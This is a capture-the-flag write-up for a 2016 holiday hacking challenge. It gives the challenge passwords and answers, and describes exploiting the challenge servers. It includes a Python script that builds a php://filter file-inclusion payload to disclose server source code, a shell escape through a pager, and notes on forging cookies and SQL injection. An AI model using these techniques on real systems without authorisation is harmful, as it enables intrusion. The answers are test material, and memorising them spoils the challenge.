Holiday Hack 2016 Q&A
1. What was the secret message in Santa’s tweets?
The secret message in Santa’s tweets was the password to the SantaGram_v4.2.zip. The
password was “bugbounty”.
2. What is inside the ZIP file distributed by Santa’s team?
The SantaGram_v4.2.apk file is inside the ZIP file distributed by Santa’s team.
3. What username and password are embedded in the APK file?
The username that is embedded in the APK file is “guest”. The password that is embedded
in the APK file is “busyreindeer78”.
4. What is the name of the audible component (audio file) in the SantaGram APK file?
The name of the audible component (audio file) in the SantaGram APK file is
discombobulatedaudio1.mp3.
5. What is the password for the “cranpi” account on the Cranberry Pi system?
yummycookies
6. How did you open each terminal door and where had the villain imprisoned Santa?
Each door had a terminal next to it that held the password for that door. To get the password, the player
had to solve the challenge in each terminal.
Elf House #2 Door: Two Password Halves Terminal
The following commands were used.
sudo -l - this command lists the commands the current user is allowed to run with sudo, which users they
may be run as, and whether a password is required for each. Two entries, for two different users, were
visible.
sudo -u itchy strings out.pcap - this runs a single command, strings, as the user itchy. sudo -l showed that
no password was required for itchy to run strings through sudo.
sudo -u itchy strings -a --encoding={s,l} out.pcap - the shell's brace expansion turns this into two runs of
strings as itchy, one with --encoding=s and one with --encoding=l. By default strings only searches for
single-7-bit-byte characters (ASCII, ISO 8859, etc., the s encoding), so the half of the password stored as
16-bit little-endian characters (the l encoding) only shows up in the second run. -a makes strings scan the
whole file instead of only the loadable, initialized data sections.
The password is santaslittlehelper.
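To make it concrete why the second strings run with --encoding=l was needed, here is an added example (not code from the original write-up) that re-implements the two encodings strings was asked for and runs them over a constructed byte blob in which one password half is plain ASCII and the other is UTF-16LE. The blob, the "part1"/"part2" labels and the minimum length are all made up for the demonstration.

```python
"""Added example: what `strings -e s` and `strings -e l` look for, in Python.

The sample bytes below are constructed for this demonstration; they are not
the out.pcap from the challenge.
"""
import re


def strings_s(data: bytes, min_len: int = 4) -> list:
    """Equivalent of `strings -e s`: runs of at least min_len printable
    single-byte (7-bit) characters, the encoding strings uses by default."""
    pattern = rb"[\x20-\x7e\t]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def strings_l(data: bytes, min_len: int = 4) -> list:
    """Equivalent of `strings -e l`: runs of at least min_len 16-bit
    little-endian characters, i.e. a printable byte followed by a zero byte.
    The regex is scanned at every byte offset, so odd-aligned runs are found."""
    pattern = rb"(?:[\x20-\x7e\t]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, data)]


def find_password_halves(data: bytes) -> tuple:
    """Run both scans, as the brace-expanded sudo command does, and return
    (single-byte strings, 16-bit little-endian strings)."""
    return strings_s(data), strings_l(data)


# Constructed sample "capture": some binary noise, an ASCII half padded with
# NULs, and a second half written as UTF-16LE (each char followed by \x00).
SAMPLE = (
    b"\x00\xff\x13PCAP-ish junk\x00\x01"
    + b"part1:santas".ljust(20, b"\x00")
    + b"\x7f\x02"
    + "part2:littlehelper".encode("utf-16-le")
    + b"\x00\x00\x03"
)


if __name__ == "__main__":
    ascii_hits, utf16_hits = find_password_halves(SAMPLE)
    print("encoding=s:", ascii_hits)   # the ASCII half only
    print("encoding=l:", utf16_hits)   # the UTF-16LE half only
```

The UTF-16LE half never appears in the single-byte scan because each of its letters is separated from the next by a zero byte, so no run of printable bytes reaches the minimum length; that is exactly why a default `strings` pass on the capture shows only one half of the password.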
Workshop Door: Evil Directory Structure
The following commands were used.
ls -ahlR /home/ - this command lists everything under /home/ recursively (-R), including hidden entries (-a),
in long format (-l) with human-readable sizes (-h).
cd - change the directory to the desired directory.
Method: list each directory individually and change into each one, escaping or quoting names as
necessary. This is necessary because the directory names contained characters (spaces, dashes and the like)
that the shell would otherwise interpret specially instead of treating as part of the name. Either backslash
escapes (\) or double quotes ("") work.
The password is open_sesame.
Santa’s Office:
This door required knowledge of the film WarGames. Simply type exactly what the character in the movie
typed, word for word, choose the option he chose, and name the first city he named; the terminal then
prints the key to the bookcase secret door on the screen.
The password is LOOK AT THE PRETTY LIGHTS.
Workshop Door: Please Don’t “Wumpus"
Reverse engineer the wumpus binary:
strings -n 10 wumpus
The getopt string in the output shows that wumpus takes the options a:b:hp:r:t:
Run the wumpus game with each option, looking for differences in functionality, to figure
out what they do.
a - number of arrows
b - number of bats (anything above 10 is rejected as too crowded)
t - number of tunnels per room (must be at least two)
r - number of rooms
Cheat:
Set the number of rooms to the minimum and the number of tunnels to the maximum, then shoot arrows
into each room that is adjacent to the player's room.
The password is WUMPUS IS MISUNDERSTOOD
Train:
The train's HELP screen is displayed through a pager, and pagers and editors such as less and vi let the
user run a shell command with ! by design, so a shell can be spawned from inside the HELP screen. *The HELP
screen is actually run with the less command. I didn't look at the source.* Type HELP, then type
"!/bin/bash" at the colon prompt at the bottom. Then ls the directory, run ./ActivateTrain, press enter,
and go back to 1978.
No Terminal Door:
One must solve the audio file puzzle in order to open this door. The files were opened individually in Audacity.
The tempo was adjusted first, so that the words could be understood, and then the pitch. Once the
adjustments were complete, all of the files were joined together, and Dr. Who could be heard saying,
"Father Christmas, Santa Claus, or as I've always known him, Jeff."
That phrase, including punctuation, was the password for the door.
Where is Santa?
The Villain trapped poor Santa in the 1978 Dungeon For Errant Reindeer (DFER) room.
7. Once you get approval of given in-scope IP Addresses from Tom Hessman at the North Pole, attempt to remotely exploit each of the following targets:
The Mobile Analytics Server (via credentialed login access)
The Dungeon Game
The Debug Server
The Banner Ad Server
The Uncaught Exception Handler Server
The Mobile Analytics Server (post authentication)
For each of those six items, which vulnerabilities did you discover and exploit?
Mobile Analytics Server
The username and password were found hard-coded in the SantaGram APK when it was reverse engineered.
All one had to do was log in with those credentials.
Dungeon Game
The developers left a debugger in the game that was used for testing purposes.
Debug Server
A method that should have been controlled server side was controlled from the app.
Banner Ad Server
The site runs on Meteor. All of the rendering is done client-side, so the server publishes the data the
page needs to the browser. Unfortunately, sometimes more data is sent to the client than the page shows.
That is the vulnerability in this server.
Ex Server (Uncaught Exception Handler Server)
There is an LFI vulnerability in the code.
The server appends .php to the name of the file it includes, including the crash dump files. When using
ReadCrashDump, one can supply
php://filter/convert.base64-encode/resource=<sensitive file> as the value of the crashdump JSON parameter
(without a .php suffix, since the server adds one).
The requested resource is base64-encoded and displayed on the screen: the include runs the php://filter
wrapper, which reads the file through the base64 filter instead of executing it, so exception.php itself is
never interpreted as code. All the attacker has to do is copy the base64 output, decode it, then read it.
There was sensitive information stored in the exception.php file: the location of
discombobulated-audio-6-XyzE3N9YqKNH.mp3.
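As an added example (not code from the original write-up or from the challenge), the following Python builds the ReadCrashDump request body described above and decodes the base64 the page echoes back. The "crashdump" JSON key, the ReadCrashDump name and the .php-appending behaviour come from the write-up; the stand-in PHP source, the HTML around the encoded blob and the path inside it are constructed here, not captured from the real server.

```python
"""Added example: php://filter source disclosure through an include() that
appends '.php'. Builds the payload and decodes the response.

The sample PHP source and response body are constructed for this example.
"""
import base64
import json
import re


def build_payload(resource: str) -> str:
    """JSON body for ReadCrashDump asking for `resource` via the base64 filter.

    The server appends '.php' itself, so a trailing '.php' is stripped here:
    requesting 'exception.php' would otherwise become 'exception.php.php'.
    """
    if resource.endswith(".php"):
        resource = resource[: -len(".php")]
    wrapper = "php://filter/convert.base64-encode/resource=" + resource
    return json.dumps({"crashdump": wrapper})


def extract_source(response_body: str) -> str:
    """Pull the first long base64 run out of the response and decode it.

    Returns '' when no plausible base64 run is present. Padding is repaired
    in case the page trimmed trailing '=' characters.
    """
    m = re.search(r"[A-Za-z0-9+/]{16,}={0,2}", response_body)
    if not m:
        return ""
    blob = m.group()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


# Constructed stand-in for a sensitive include file (not the real exception.php).
FAKE_SOURCE = (
    "<?php\n"
    "// constructed stand-in for exception.php\n"
    "$audio = '/constructed/path/to/audio6.mp3';\n"
)

# Constructed response: the handler echoes the base64-encoded file inside HTML.
SAMPLE_RESPONSE = (
    "<html><body>"
    + base64.b64encode(FAKE_SOURCE.encode()).decode()
    + "</body></html>"
)


if __name__ == "__main__":
    print(build_payload("exception.php"))
    print(extract_source(SAMPLE_RESPONSE))
```

The key check before trying this against a real target is the suffix: if the server appends .php, the resource name in the wrapper must be given without it, and the decoded output should start with `<?php` when the right file came back.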
Analytics Server 2
A git repository was exposed to the Internet and was world-readable. One could clone it and get the source
code for every program on the server. The authentication cookie was easy to forge once one had the code
that produces it, because the key was included in that code. The experimental Edit page was vulnerable
to SQL injection via the query parameter. The database credentials are included in db.php.
8. What are the names of the audio files you discovered from each system above?
SantaGram_v4.2.apk: discombobulatedaudio1.mp3
Analytics Server: Part One: discombobulatedaudio2.mp3
Dungeon Server: discombobulatedaudio3.mp3
Dev Server: debug-20161224235959-0.mp3
Ads Server: discombobulatedaudio5.mp3
Ex Server: discombobulated-audio-6-XyzE3N9YqKNH.mp3
Analytics Server: Part Two: discombobulatedaudio7.mp3
9. Who is the villain behind the nefarious plot?
Dr. Who
10. Why had the villain abducted Santa?
He wanted to change the timeline so that the 1978 Star Wars Holiday special never occurred.